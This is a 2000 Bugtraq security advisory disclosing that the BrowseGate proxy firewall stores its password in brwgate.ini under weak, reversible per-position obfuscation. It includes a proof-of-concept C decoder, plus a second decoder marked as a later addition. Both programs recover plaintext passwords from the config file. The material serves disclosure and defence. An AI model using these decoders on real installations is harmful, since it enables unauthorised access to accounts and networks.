[17695] in bugtraq
Decrypting passwords for BrowseGate
daemon@ATHENA.MIT.EDU (Steven Alexander)
Sun Nov 19 20:35:14 2000
Message-Id: <002a01c051c7$d03240f0$0100007f@cell2000.net>
Date: Sat, 18 Nov 2000 17:26:18 -0800
Reply-To: Steven Alexander <steve@cell2000.net>
From: Steven Alexander <steve@CELL2000.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Product: BrowseGate by NetCPlus
Version: 2.80.2 (others?)
OS: Windows NT/2000/9x
Description:
BrowseGate is a proxy firewall from NetCPlus. BrowseGate is sometimes
installed on servers along with other network applications, including
SmartServer3, with which it is made to integrate. BrowseGate installs by
default in C:\Program Files\BrowseGate\ and stores its configuration
information in the file brwgate.ini. The file is accessible, by default,
to all authenticated users (authenticated to Windows). The "encrypted"
password is stored under the 'scrnsze' setting, for instance:

    scrnsze=Ic6li9m\

The password encryption is very weak. Though it has some other strange
properties, the scheme works by adding a position-specific value to each
character of the password. There are seven characters that encrypt
differently from the rest of the character set; I can only guess that it
might be to throw off any analysis, but am not particularly sure. This
scheme appears related to the one used in SmartServer 3 but is somewhat
different. Look at the code for more details.

The vendor was contacted in regard to a previous security issue with
another product. Unfortunately, the vendor acted in an extremely
unprofessional manner. In addition to denying the problem, they responded
with insults and implied threats against me. At this point, it is up to the
customers of this vendor to ask for what they deserve: a reasonable measure
of security. In the meantime, it would be useful to restrict access to the
folder in which BrowseGate is installed.

-Steven Alexander
steve@cell2000.net

Attachment: browse.c

/* This is proof of concept code for decrypting password from BrowseGate by NetCplus */
#include <stdio.h>

int main(void) {
    /* Position-specific value added to each of the eight password characters */
    unsigned char start[8] = { 0x27, 0x41, 0x72, 0x4a, 0x47, 0x75, 0x4b, 0x3a };
    unsigned char hash[8] = { '%', '}', 'S', 'p', '%', 'g', 'Z', '(' };
    /* Enter the encrypted password into hash above */
    /* Per position, the first of seven consecutive encrypted values that
       decode to the specially handled characters */
    unsigned char except[8] = { '~', ':', 'k', 'C', '@', 'n', 'D', '3' };
    /* The seven specially handled characters, in the order they are assigned */
    unsigned char ex_order[7] = { 't', 'm', 'O', 'L', 's', 'B', 'R' };
    unsigned char pass[8];
    unsigned char i;

    /* At position 0 the special range wraps past '~': map '!'..'&' to 0x7f..0x84 */
    if (hash[0] >= '!' && hash[0] <= '&')
        hash[0] = (hash[0] - 0x20) + 0x7e;

    for (i = 0; i < 8; i++) {
        if (hash[i] >= except[i] && hash[i] <= (except[i] + 6)) {
            /* One of the seven special characters */
            pass[i] = ex_order[hash[i] - except[i]];
        } else {
            /* Undo the wrap-around within the 94 printable characters */
            if (hash[i] < start[i]) {
                hash[i] += 0x5e;
            }
            /* Remove the position-specific value */
            pass[i] = hash[i] - start[i] + '!';
            /* Step over each special character, which the ordinary mapping skips */
            if (pass[i] >= 'B')
                pass[i] += 1;
            if (pass[i] >= 'L')
                pass[i] += 1;
            if (pass[i] >= 'O')
                pass[i] += 1;
            if (pass[i] >= 'R')
                pass[i] += 1;
            if (pass[i] >= 'm')
                pass[i] += 1;
            if (pass[i] >= 's')
                pass[i] += 1;
            if (pass[i] >= 't')
                pass[i] += 1;
        }
    }

    printf("The password is:\n\t");
    for (i = 0; i < 8; i++) {
        printf("%c ", pass[i]);
    }
    printf("\n");
    return 0;
}
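
The scheme described in the advisory, restated as an added example (not part of the original post or of browse.c): the seven special characters are the tail of one fixed 94-character alphabet, and each position rotates that alphabet by its start[] value, so a stored scrnsze value is reversible with no secret at all. The function names, the input checks and the acceptance of values shorter than eight characters are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

#define NCHARS 94 /* printable ASCII '!' (0x21) through '~' (0x7e) */
#define MAXLEN 8  /* the tables in browse.c cover eight positions */

/* Per-position offsets, copied from start[] in browse.c. */
static const unsigned char start[MAXLEN] =
    { 0x27, 0x41, 0x72, 0x4a, 0x47, 0x75, 0x4b, 0x3a };

/* The single alphabet behind the scheme: the 87 ordinary characters in
   ASCII order, then the seven special ones in the order of ex_order[]. */
static void build_alphabet(unsigned char alpha[NCHARS]) {
    static const char special[] = "tmOLsBR";
    int n = 0;
    for (int c = '!'; c <= '~'; c++)
        if (!strchr(special, c))
            alpha[n++] = (unsigned char)c;
    memcpy(alpha + n, special, 7);
}

/* Recover the password from a stored scrnsze value. Returns 0 on success,
   -1 if the value is longer than MAXLEN or contains a non-printable byte.
   Accepting values shorter than eight characters is an assumption. */
int decode(const char *stored, char out[MAXLEN + 1]) {
    unsigned char alpha[NCHARS];
    size_t len = strlen(stored);
    if (len > MAXLEN)
        return -1;
    build_alphabet(alpha);
    for (size_t i = 0; i < len; i++) {
        int c = (unsigned char)stored[i];
        if (c < '!' || c > '~')
            return -1;
        /* Rotate back by the fixed offset for this position, modulo 94. */
        out[i] = (char)alpha[(c - start[i] + NCHARS) % NCHARS];
    }
    out[len] = '\0';
    return 0;
}

int main(void) {
    char out[MAXLEN + 1];
    /* Sample value quoted in the advisory text (scrnsze=Ic6li9m\). */
    if (decode("Ic6li9m\\", out) == 0)
        printf("%s\n", out);
    return 0;
}
```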